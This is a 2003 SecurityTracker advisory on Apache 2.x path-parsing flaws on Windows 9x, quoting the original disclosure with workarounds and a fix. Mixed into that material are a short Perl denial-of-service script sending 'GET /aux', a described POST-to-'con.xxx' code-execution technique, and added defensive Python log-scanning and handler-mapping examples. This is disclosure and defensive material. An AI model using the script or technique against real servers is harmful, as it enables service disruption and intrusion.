SecurityTracker.com
Category: Application (Web Server/CGI) > Apache
Vendors: Apache Software Foundation
Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
SecurityTracker Alert ID: 1005963
SecurityTracker URL: http://securitytracker.com/id/1005963
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jan 22 2003
Impact: Denial of service via network, Execution of arbitrary code via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 2.0.43 and prior; 2.x branch only
Description:   Two vulnerabilities were reported in the Apache 2.x web server software when running on certain Microsoft Windows operating systems. A remote user can cause denial of service conditions. A remote user may also be able to execute arbitrary code.

It is reported that a remote user can request a reserved DOS device name (e.g., 'aux') to cause denial of service conditions on the server. According to the report, this may be due to a flaw in the ap_directory_walk function.

A demonstration exploit script is provided in the Source Message. The script makes the following request:

GET /aux HTTP/1.0

It is reported that, although the Apache 2.0.44 release announcement states that earlier Microsoft patches eliminate this vulnerability, Apache 2.x versions prior to 2.0.44 remain vulnerable: some DOS device names, when opened with certain file permission masks, still hang the system.

It is also reported that a remote user can exploit the same flaw to execute arbitrary code on the system. Because a CGI program reads POST data from its standard input, a remote user can reportedly send a POST request to a device name such as 'con.xxx' in a ScriptAlias'ed directory so that the POST body may be executed by the CGI interpreter configured for that directory.

According to the report, Apache 1.x versions are not affected by these bugs.
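Added example, not part of the SecurityTracker advisory or the original report: a small scanner for Apache Common Log Format access-log lines that flags requests whose path members name a reserved Windows device (the 'aux' and 'con.xxx' requests described above). The sample log lines, the LOG_RE pattern and the function names are constructed for this example; the reserved-name list is Microsoft's documented set, and Windows resolves "name.ext" to the device "name", which is what lets "con.xxx" reach the CON device.

```python
import re
from urllib.parse import unquote

# Reserved Windows device names (documented by Microsoft for the Win32 namespace):
# CON, PRN, AUX, NUL, COM1-COM9 and LPT1-LPT9. Windows resolves "name.ext" to
# the device "name", which is why the advisory's "con.xxx" request reaches CON.
RESERVED_DEVICES = (
    {"con", "prn", "aux", "nul"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)

# Common Log Format as written by Apache's default access log. Constructed
# regex for this example; trailing referer/user-agent fields of the combined
# format are simply not captured, since only IP, method and path are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def reserved_device_segments(request_path):
    """Return the path segments of a request URI that name a reserved device.

    The query string is dropped, percent-encoding is decoded (so %43%4f%4e
    equals CON), both '/' and '\\' are treated as separators, and the
    comparison is case-insensitive on the part before the first dot.
    """
    path = unquote(request_path.split("?", 1)[0])
    hits = []
    for segment in re.split(r"[/\\]+", path):
        if not segment:
            continue
        base = segment.split(".", 1)[0].strip().lower()
        if base in RESERVED_DEVICES:
            hits.append(segment)
    return hits


def scan_access_log(lines):
    """Return one finding per log line whose request path touches a reserved device."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # not Common Log Format; skip rather than guess
        devices = reserved_device_segments(m["path"])
        if devices:
            findings.append(
                {"ip": m["ip"], "method": m["method"], "path": m["path"], "devices": devices}
            )
    return findings


# Constructed sample log lines: the first three resemble the requests the
# advisory describes; the last two are benign look-alikes that must not match.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jan/2003:09:48:26 -0500] "GET /aux HTTP/1.0" 200 0',
    '10.0.0.5 - - [22/Jan/2003:09:49:01 -0500] "POST /cgi-bin/con.xxx HTTP/1.0" 200 0',
    '10.0.0.9 - - [22/Jan/2003:09:52:00 -0500] "GET /images/%43%4f%4e.gif HTTP/1.0" 404 0',
    '10.0.0.7 - - [22/Jan/2003:09:50:12 -0500] "GET /index.html HTTP/1.0" 200 1234',
    '10.0.0.7 - - [22/Jan/2003:09:51:30 -0500] "GET /docs/Auxiliary/readme.txt HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['method']} {finding['path']} -> {finding['devices']}")
```

The decode-then-split order matters: a percent-encoded or mixed-case device name must be normalised before the comparison, and the "Auxiliary" directory shows why the check is on the exact base name rather than a prefix.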

Impact:   A remote user can cause denial of service conditions on the server. A remote user may be able to execute arbitrary code on the server with the privileges of the server.
Solution:   The vendor has released a fixed version (2.0.44), available at:

http://httpd.apache.org/dist/httpd

The author of the report has provided some workarounds, described in the Source Message.

Vendor URL: httpd.apache.org/
Cause:   Input validation error, Resource error
Underlying OS:   Windows (Me), Windows (95), Windows (98)

Message History:   None.


 Source Message Contents

Date:  Wed, 22 Jan 2003 09:48:26 -0500
Subject:  [VulnWatch] Path Parsing Errata in Apache HTTP Server




Original Message:
-----------------
From: mattmurphy@kc.rr.com mattmurphy@kc.rr.com
Date: Wed, 22 Jan 2003 09:00:58 -0500
To: full-disclosure@lists.netsys.com
Subject: Path Parsing Errata in Apache HTTP Server



Path Parsing Errata in Apache HTTP Server

ABSTRACT

The Apache HTTP Server <http://httpd.apache.org/> powers a 
whopping two thirds of all internet web sites, offering such powerful 
features as SSI, pre-forked and multi-threaded MPMs, input and output 
filtering, advanced logging, dynamic actions, dynamic modules, 
reverse DNS, virtual hosting, and even SSL via a fully extensible 
interface.  It operates on an incredible number of platforms, including 
nearly all major Unix variants, Novell Netware and Microsoft Windows; 
Apache has also been ported to cygwin.

DESCRIPTION

The Apache HTTP Server contains several flaws related to its path 
mapping routines that could enable an attacker to cause Apache to 
handle files incorrectly, cause a system-wide denial of service, or 
possibly execute arbitrary code.

ANALYSIS

Issue 1 (VU#979793):

Exploitation of this condition leads to a remote denial of service against 
a Windows 9x system running Apache, and appears to be due to 
erroneous checks in the ap_directory_walk function.  A denial of service 
can be caused with a web browser by requesting a reserved device 
such as "aux":

--- Apache2-nuke.pl ---
#!/usr/bin/perl
# Apache2-nuke.pl: opens a TCP connection to <host>:<port> and sends the
# single request described in the advisory ("GET /aux HTTP/1.0").
use strict;
use warnings;
use IO::Socket::INET;

if (@ARGV < 1 || @ARGV > 2) {
	print STDOUT "Usage: perl $0 <host> <port=80>\n";
	exit;
}
# Second argument is the port; default to 80 when it is omitted.
my $port = (@ARGV == 2) ? $ARGV[1] : 80;

my $f = IO::Socket::INET->new(Proto => "tcp", PeerHost => $ARGV[0],
	PeerPort => $port)
	or die "Cannot connect to $ARGV[0]:$port: $@\n";
print $f "GET /aux HTTP/1.0\r\n\r\n";
close($f);
--- Apache2-nuke.pl ---

The Apache 2.0.44 release announcement incorrectly states that 
previous Microsoft patches eliminate this vulnerability.  There are some 
devices on Windows platforms that will hang the system if opened with 
certain file permissions masks.

Issue 2 (VU#825177):

Exploitation of this condition leads to a remote compromise.  This 
issue is also restricted to Windows 9x versions of Apache, and has the 
same underlying cause as the previously noted denial of service 
condition.  It is related to CGI input redirection.

Specifically, when POSTing to a CGI, the stdin stream points to the 
input form data.   By sending a POST to "con.xxx" in a ScriptAlias'ed 
directory, your POST data *may* be executed by that interpreter.

Issue 3 (VU#384033):

Exploitation of this condition could lead to bypass of default script 
mapping behavior.  This flaw impacts Apache on all platforms.  This 
issue is best described with an example:

http://localhost/folder.php/file

Apache should parse 'file' as plain text -- that is, simply return it to 
the browser.  However, an incorrect check in Apache's mapping 
algorithms causes the 'php' extension to be associated with this 
request.  Rather than checking only the file's extension, Apache checks 
for extensions in any path member, stopping at the first.

This is more of a weakness than a vulnerability, as exploitation only 
yields UID nobody if you allow uploading under the docroot *and* filter 
by filename only, in which case you have far more serious concerns 
than the exploitation of this issue.

DETECTION

These issues are believed to be specific to the 2.0 branch; Apache 
1.3.27 (and all other 1.x versions) are believed immune from these 
issues.  Apache 2.0.43 and prior should be upgraded to the 2.0.44 
release, which will be available from 
<http://httpd.apache.org/dist/httpd>.

WORKAROUNDS

* I recommend that servers running Windows 9x be upgraded to a 
production environment (Windows NT, 2000, or XP, for example).  This 
offers a solution to VU#979793, and VU#825177.

* A configuration workaround is available for VU#384033.  For any 
directories allowing uploads, add the following lines:

<Directory "/var/apache/htdocs/uploads/">
AllowOverride None
Options -Includes -ExecCGI
SetHandler default-handler
</Directory>

* All sites running Apache 2.0.43 and prior should be upgraded to 
2.0.44 if impacted by these issues.

DISCLOSURE TIMELINE

December 4, 2002: security@apache.org notified
December 5, 2002: Confirmation response received from William 
Rowe, Jr. (wrowe@rowe-clan.net); auditing begins.
December 5, 2002: cert@cert.org contacted
December 5, 2002: Automated response from CERT/CC incident 
response.
December 9, 2002: Follow-up received from William Rowe, Jr. 
indicates that cause of reserved device issue has been identified.
December 10, 2002: Initial patch binaries received from William Rowe, 
Jr. (libapr.dll and libhttpd.dll).  Fix for reserved device flaw confirmed, 
but dot-in-path attack remains.
December 10, 2002: CERT/CC response received from Chad 
Dougherty; vulnerability IDs are assigned.
December 10, 2002: Reply to Chad Dougherty indicating that precise 
details of VU#825177 will not be immediately disclosed.
December 10, 2002: Reply to William Rowe, Jr. requesting 
confirmation of status and receipt of VU#384033.
December 10/11, 2002: Series of e-mail communications to clarify the 
impacts/origins of VU#384033; source of issue is identified.
January 20, 2002: Apache 2.0.44 released
January 22, 2002: Public disclosure

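As an added illustration of Issue 3 (VU#384033) and of the SetHandler workaround in the message above, here is example code written for this page; it is not code from the advisory or from the Apache project. It models, in Python, the two mapping behaviours the report contrasts: a mapper that takes the first path member carrying a mapped extension, and a corrected mapper that only looks at the final member, plus a per-directory override that reproduces the effect of a <Directory> block with SetHandler default-handler on an uploads directory. The HANDLERS table, the function names and the /uploads/ prefix are constructed for the example; the mapping logic follows the advisory's description and is not Apache's implementation.

```python
import posixpath

# Extension-to-handler table, standing in for AddHandler/AddType directives.
# Constructed for this example.
HANDLERS = {".php": "application/x-httpd-php", ".cgi": "cgi-script"}
DEFAULT_HANDLER = "default-handler"


def ext_of(segment):
    """Lower-cased extension of one path member ('' when there is none)."""
    return posixpath.splitext(segment)[1].lower()


def handler_any_segment(url_path):
    """Model of the mapping the advisory describes for 2.0.43 and earlier
    (VU#384033): every path member is inspected and the first one carrying a
    mapped extension selects the handler, so /folder.php/file is handed to PHP.
    This models the described behaviour; it is not Apache's own code."""
    for segment in url_path.split("/"):
        handler = HANDLERS.get(ext_of(segment))
        if handler is not None:
            return handler
    return DEFAULT_HANDLER


def handler_last_segment(url_path):
    """Corrected mapping: only the final member, the file actually served,
    may select a handler; extensions on directory names are ignored."""
    return HANDLERS.get(ext_of(posixpath.basename(url_path)), DEFAULT_HANDLER)


def handler_with_overrides(url_path, overrides, mapper=handler_any_segment):
    """Apply per-directory SetHandler overrides on top of a mapper.

    'overrides' maps a directory prefix (e.g. '/uploads/') to the handler a
    <Directory> block forces with SetHandler. The path is normalised first so
    '/uploads/../x' is not treated as living under /uploads/.
    """
    normalised = posixpath.normpath(url_path)
    for prefix, forced in overrides.items():
        if normalised.startswith(prefix) or normalised == prefix.rstrip("/"):
            return forced
    return mapper(url_path)


# The advisory's workaround expressed in this model: anything under the
# uploads directory gets the default handler even when the extension mapping
# would have picked an interpreter.
UPLOAD_OVERRIDES = {"/uploads/": DEFAULT_HANDLER}

if __name__ == "__main__":
    for path in ("/folder.php/file", "/folder/file.php", "/uploads/notes.php"):
        print(path, handler_any_segment(path), handler_last_segment(path),
              handler_with_overrides(path, UPLOAD_OVERRIDES))
```

Run stand-alone, the script shows the three outcomes side by side: the weak mapper routes /folder.php/file to the PHP handler, the corrected mapper serves it as a plain file, and the override forces the default handler for the uploads directory regardless of which mapper is in use, which is exactly why the configuration workaround holds up even before the server is upgraded.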
Copyright 2014, SecurityGlobal.net LLC